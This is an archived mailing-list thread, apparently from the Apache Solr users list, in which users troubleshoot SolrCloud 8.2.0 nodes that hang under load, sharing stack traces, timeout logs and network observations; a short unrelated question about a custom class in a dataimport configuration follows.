>
> I had this problem. In my case was the wait/io in vm. I migrate my
> environment to another place and solved.
>
> Actually it's problem wirh wait/io at host physical (until backup it's a
> problem over veeam).
>
> Regards
>
> Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
>  escreveu:
>
> > The problem reoccurs repeatly in recent days.
> > To day i tried dump heap and thread. Only dumping thread, heap can not
> > because solr instance was hang.
> > Almost thread was blocked.
> >
> > On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
> >  wrote:
> >
> >
> > I checked node exporter metrics and saw network no problem
> >
> > On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> > tranvanhoan...@yahoo.com> wrote:
> >
> >
> > I check node exporter, no problem with OS, hardware and network.
> > I attached images about solr metrics 7 days and 12h.
> >
> > On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> > dario.rigo...@comperio.it> wrote:
> >
> >
> > What about a network issue?
> >
> > Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
> >  ha scritto:
> >
> >
> > >
> > > dear all,
> > >
> > >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > > instance has xmx = xms = 30G.
> > >
> > > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One
> node
> > > were down. almost metrics didn't increase too much except threads.
> > >
> > > Performance in one week ago:
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > performace 12h ago:
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > I go to the admin UI, some node dead some node too long to response.
> When
> > > checking logfile, they generate too much (log level warning), here are
> > logs
> > > which appears in the solr cloud:
> > >
> > > Log before server 4 and 6 down
> > >
> > > - Server 4 before it dead:
> > >
> > >    + o.a.s.h.RequestHandlerBase java.io.IOException:
> > > java.util.concurrent.TimeoutException: Idle timeout expired:
> > 12/12
> > > ms
> > >
> > >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
 All server only run Solr, zookeeper, exporters (node-exporter, 
process-exporter, solr-exporter, zoo-exporter). 
- network: no package loss, TCP no issue before incident, TCP drop around 
100-200/s when incident and overflow ~100 in somaxcon.
- total mem Avalilable is greater 25G (Solr's XMX = 30G)- CPU < 10%, no high 
load average 5, 15 (except when solr hang, high load average is high)- Normally 
total process is around ~2k, when incident occurs, total thread is 25.6 (solr 
out of cluster but still running)- low TCP contrack- Swapiness = 0 and no use 
swap;- Solr cloud has 2 collections, only one collection down causes node down 
(the remain collection is still green)

On Sunday, July 5, 2020, 1:30:59 AM GMT+7, Rodrigo Oliveira 
 wrote:  
 
 Network it's ok? Between nodes? The use? Swap it's disabled? Swapiness rhe
value it's 0?

Em sáb, 4 de jul de 2020 15:19, Tran Van Hoan
 escreveu:

>  I used physical servers, and IO wait is small :(!!!I saw that iptables
> dropped all ACK message from clients (not only client solr, prometheus
> scape metric from exporter was dropped too).all when i check netstat
> -anp|grep 8983, all socket are TIME_WAIT state.Only restart solrs, the
> incident was resolved. Total request around 2.5k request per second per
> node.
>
>    On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira <
> adamantina.rodr...@gmail.com> wrote:
>
>  Hi,
>
> I had this problem. In my case was the wait/io in vm. I migrate my
> environment to another place and solved.
>
> Actually it's problem wirh wait/io at host physical (until backup it's a
> problem over veeam).
>
> Regards
>
> Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
>  escreveu:
>
> > The problem reoccurs repeatly in recent days.
> > To day i tried dump heap and thread. Only dumping thread, heap can not
> > because solr instance was hang.
> > Almost thread was blocked.
> >
> > On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
> >  wrote:
> >
> >
> > I checked node exporter metrics and saw network no problem
> >
> > On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> > tranvanhoan...@yahoo.com> wrote:
> >
> >
> > I check node exporter, no problem with OS, hardware and network.
> > I attached images about solr metrics 7 days and 12h.
> >
> > On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> > dario.rigo...@comperio.it> wrote:
> >
> >
> > What about a network issue?
> >
> > Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
> >  ha scritto:
> >
> >
> > >
> > > dear all,
> > >
> > >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > > instance has xmx = xms = 30G.
> > >
> > > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One
> node
> > > were down. almost metrics didn't increase too much except threads.
> > >
> > > Performance in one week ago:
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > performace 12h ago:
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > I go to the admin UI, some node dead some node too long to response.
> When
> > > checking logfile, they generate too much (log level warning), here are
> > logs
> > > which appears in the solr cloud:
> > >
> > > Log before server 4 and 6 down
> > >
> > > - Server 4 before it dead:
> > >
> > >    + o.a.s.h.RequestHandlerBase java.io.IOException:
> > > java.util.concurrent.TimeoutException: Idle timeout expired:
> > 12/12
> > > ms
> > >
> > >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured
> while
> > > waiting response from server at:
> > > http://server6:8983/solr/mycollection_shard

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Rodrigo Oliveira
Network it's ok? Between nodes? The use? Swap it's disabled? Swapiness rhe
value it's 0?

Em sáb, 4 de jul de 2020 15:19, Tran Van Hoan
 escreveu:

>  I used physical servers, and IO wait is small :(!!!I saw that iptables
> dropped all ACK message from clients (not only client solr, prometheus
> scape metric from exporter was dropped too).all when i check netstat
> -anp|grep 8983, all socket are TIME_WAIT state.Only restart solrs, the
> incident was resolved. Total request around 2.5k request per second per
> node.
>
> On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira <
> adamantina.rodr...@gmail.com> wrote:
>
>  Hi,
>
> I had this problem. In my case was the wait/io in vm. I migrate my
> environment to another place and solved.
>
> Actually it's problem wirh wait/io at host physical (until backup it's a
> problem over veeam).
>
> Regards
>
> Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
>  escreveu:
>
> > The problem reoccurs repeatly in recent days.
> > To day i tried dump heap and thread. Only dumping thread, heap can not
> > because solr instance was hang.
> > Almost thread was blocked.
> >
> > On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
> >  wrote:
> >
> >
> > I checked node exporter metrics and saw network no problem
> >
> > On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> > tranvanhoan...@yahoo.com> wrote:
> >
> >
> > I check node exporter, no problem with OS, hardware and network.
> > I attached images about solr metrics 7 days and 12h.
> >
> > On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> > dario.rigo...@comperio.it> wrote:
> >
> >
> > What about a network issue?
> >
> > Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
> >  ha scritto:
> >
> >
> > >
> > > dear all,
> > >
> > >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > > instance has xmx = xms = 30G.
> > >
> > > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One
> node
> > > were down. almost metrics didn't increase too much except threads.
> > >
> > > Performance in one week ago:
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > performace 12h ago:
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > I go to the admin UI, some node dead some node too long to response.
> When
> > > checking logfile, they generate too much (log level warning), here are
> > logs
> > > which appears in the solr cloud:
> > >
> > > Log before server 4 and 6 down
> > >
> > > - Server 4 before it dead:
> > >
> > >+ o.a.s.h.RequestHandlerBase java.io.IOException:
> > > java.util.concurrent.TimeoutException: Idle timeout expired:
> > 12/12
> > > ms
> > >
> > >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured
> while
> > > waiting response from server at:
> > > http://server6:8983/solr/mycollection_shard3_replica_n5/select
> > >
> > >
> > >
> > > at
> > >
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
> > >
> > >at
> > >
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
> > >
> > >at
> > > org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
> > >
> > >at
> > >
> >
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
> > >
> > >at
> > >
> >
> org.apache.solr.handler.component.HttpShar

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
 I used physical servers, and IO wait is small :(!!!I saw that iptables dropped 
all ACK message from clients (not only client solr, prometheus scape metric 
from exporter was dropped too).all when i check netstat -anp|grep 8983, all 
socket are TIME_WAIT state.Only restart solrs, the incident was resolved. Total 
request around 2.5k request per second per node.

On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira 
 wrote:  
 
 Hi,

I had this problem. In my case was the wait/io in vm. I migrate my
environment to another place and solved.

Actually it's problem wirh wait/io at host physical (until backup it's a
problem over veeam).

Regards

Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
 escreveu:

> The problem reoccurs repeatly in recent days.
> To day i tried dump heap and thread. Only dumping thread, heap can not
> because solr instance was hang.
> Almost thread was blocked.
>
> On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
>  wrote:
>
>
> I checked node exporter metrics and saw network no problem
>
> On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> tranvanhoan...@yahoo.com> wrote:
>
>
> I check node exporter, no problem with OS, hardware and network.
> I attached images about solr metrics 7 days and 12h.
>
> On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> dario.rigo...@comperio.it> wrote:
>
>
> What about a network issue?
>
> Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
>  ha scritto:
>
>
> >
> > dear all,
> >
> >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > instance has xmx = xms = 30G.
> >
> > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One node
> > were down. almost metrics didn't increase too much except threads.
> >
> > Performance in one week ago:
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > performace 12h ago:
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > I go to the admin UI, some node dead some node too long to response. When
> > checking logfile, they generate too much (log level warning), here are
> logs
> > which appears in the solr cloud:
> >
> > Log before server 4 and 6 down
> >
> > - Server 4 before it dead:
> >
> >    + o.a.s.h.RequestHandlerBase java.io.IOException:
> > java.util.concurrent.TimeoutException: Idle timeout expired:
> 12/12
> > ms
> >
> >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured while
> > waiting response from server at:
> > http://server6:8983/solr/mycollection_shard3_replica_n5/select
> >
> >
> >
> > at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
> >
> >                at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
> >
> >                at
> > org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
> >
> >                at
> >
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
> >
> >                at
> >
> org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:199)
> >
> >                at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >                at
> > java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
> >
> >                at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >                at
> >
> com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:181)
> >
> >                at
> >
> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:209)
> >
> >                at
> >
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> >
> >                at
> >
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> >
> >                ... 1 more
> 

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Rodrigo Oliveira
Hi,

I had this problem. In my case was the wait/io in vm. I migrate my
environment to another place and solved.

Actually it's problem wirh wait/io at host physical (until backup it's a
problem over veeam).

Regards

Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
 escreveu:

> The problem reoccurs repeatly in recent days.
> To day i tried dump heap and thread. Only dumping thread, heap can not
> because solr instance was hang.
> Almost thread was blocked.
>
> On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
>  wrote:
>
>
> I checked node exporter metrics and saw network no problem
>
> On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> tranvanhoan...@yahoo.com> wrote:
>
>
> I check node exporter, no problem with OS, hardware and network.
> I attached images about solr metrics 7 days and 12h.
>
> On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> dario.rigo...@comperio.it> wrote:
>
>
> What about a network issue?
>
> Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
>  ha scritto:
>
>
> >
> > dear all,
> >
> >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > instance has xmx = xms = 30G.
> >
> > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One node
> > were down. almost metrics didn't increase too much except threads.
> >
> > Performance in one week ago:
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > performace 12h ago:
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > I go to the admin UI, some node dead some node too long to response. When
> > checking logfile, they generate too much (log level warning), here are
> logs
> > which appears in the solr cloud:
> >
> > Log before server 4 and 6 down
> >
> > - Server 4 before it dead:
> >
> >+ o.a.s.h.RequestHandlerBase java.io.IOException:
> > java.util.concurrent.TimeoutException: Idle timeout expired:
> 12/12
> > ms
> >
> >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured while
> > waiting response from server at:
> > http://server6:8983/solr/mycollection_shard3_replica_n5/select
> >
> >
> >
> > at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
> >
> >at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
> >
> >at
> > org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
> >
> >at
> >
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
> >
> >at
> >
> org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:199)
> >
> >at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >at
> > java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
> >
> >at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >at
> >
> com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:181)
> >
> >at
> >
> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:209)
> >
> >at
> >
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> >
> >at
> >
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> >
> >... 1 more
> >
> > Caused by: java.util.concurrent.TimeoutException
> >
> >at
> >
> org.eclipse.jetty.client.util.InputStreamResponseListener.get(InputStreamResponseListener.java:216)
> >
> >at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:397)
> >
> >... 12 more
> >
> >
> >
> &

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
 The problem reoccurs repeatly in recent days. 
To day i tried dump heap and thread. Only dumping thread, heap can not because 
solr instance was hang.Almost thread was blocked.

On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan 
 wrote:  
 
  I checked node exporter metrics and saw network no problem

On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan 
 wrote:  
 
  I check node exporter, no problem with OS, hardware and network.I attached 
images about solr metrics 7 days and 12h.

On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin 
 wrote:  
 
 What about a network issue?

Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
 ha scritto:

>
> dear all,
>
>  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> instance has xmx = xms = 30G.
>
> Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One node
> were down. almost metrics didn't increase too much except threads.
>
> Performance in one week ago:
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> performace 12h ago:
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> I go to the admin UI, some node dead some node too long to response. When
> checking logfile, they generate too much (log level warning), here are logs
> which appears in the solr cloud:
>
> Log before server 4 and 6 down
>
> - Server 4 before it dead:
>
>    + o.a.s.h.RequestHandlerBase java.io.IOException:
> java.util.concurrent.TimeoutException: Idle timeout expired: 12/12
> ms
>
>  +org.apache.solr.client.solrj.SolrServerException: Timeout occured while
> waiting response from server at:
> http://server6:8983/solr/mycollection_shard3_replica_n5/select
>
>
>
> at
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
>
>                at
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
>
>                at
> org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
>
>                at
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
>
>                at
> org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:199)
>
>                at java.util.concurrent.FutureTask.run(FutureTask.java:266)
>
>                at
> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>
>                at java.util.concurrent.FutureTask.run(FutureTask.java:266)
>
>                at
> com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:181)
>
>                at
> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:209)
>
>                at
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>
>                at
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>
>                ... 1 more
>
> Caused by: java.util.concurrent.TimeoutException
>
>                at
> org.eclipse.jetty.client.util.InputStreamResponseListener.get(InputStreamResponseListener.java:216)
>
>                at
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:397)
>
>                ... 12 more
>
>
>
> + o.a.s.s.HttpSolrCall invalid return code: -1
>
> + o.a.s.s.PKIAuthenticationPlugin Invalid key request timestamp:
> 1592803662746 , received timestamp: 1592803796152 , TTL: 12
>
> + o.a.s.s.PKIAuthenticationPlugin Decryption failed , key must be wrong =>
> java.security.InvalidKeyException: No installed provider supports this key:
> (null)
>
> +  o.a.s.u.ErrorReportingConcurrentUpdateSolrClient Error when calling
> SolrCmdDistributor$Req: cmd=delete{,commitWithin=-1}; node=ForwardNode:
> http://server6:8983/solr/mycollection_shard3_replica_n5/ to
> http://server6:8983/solr/mycollection_shard3_replica_n5/ =>
> java.util.concurrent.TimeoutException
>
> + o.a.s.s.HttpSolrCall
> null:org.apache.solr.update.processor.DistributedUpdateProcessor$DistributedUpdatesAsyncException:
> Async exception during distributed update: null
>
>
>
> Server 2:
>
>  + Max requests queued per destination 3000 exceeded for
> HttpDestination[http://server4:8983
> ]@7d7ec93c,queue=3000,pool=MultiplexConnectionPool@73b938e3
> [c=4/4,b=4,m=0,i=0]
>
>  +  Max requests queued per destination 3000 exceeded for

SolrCloud with custom package in dataimport

2020-06-26 Thread stefan
Hey,

Is it possible to reference a custom java class during the dataimport? The 
dataimport looks something like this:

```






db-data-config.xml


```

Sadly I was unable to find any information on this topic.

Thanks for your help!


  1   2   3   4   5   6   7   8   9   10   >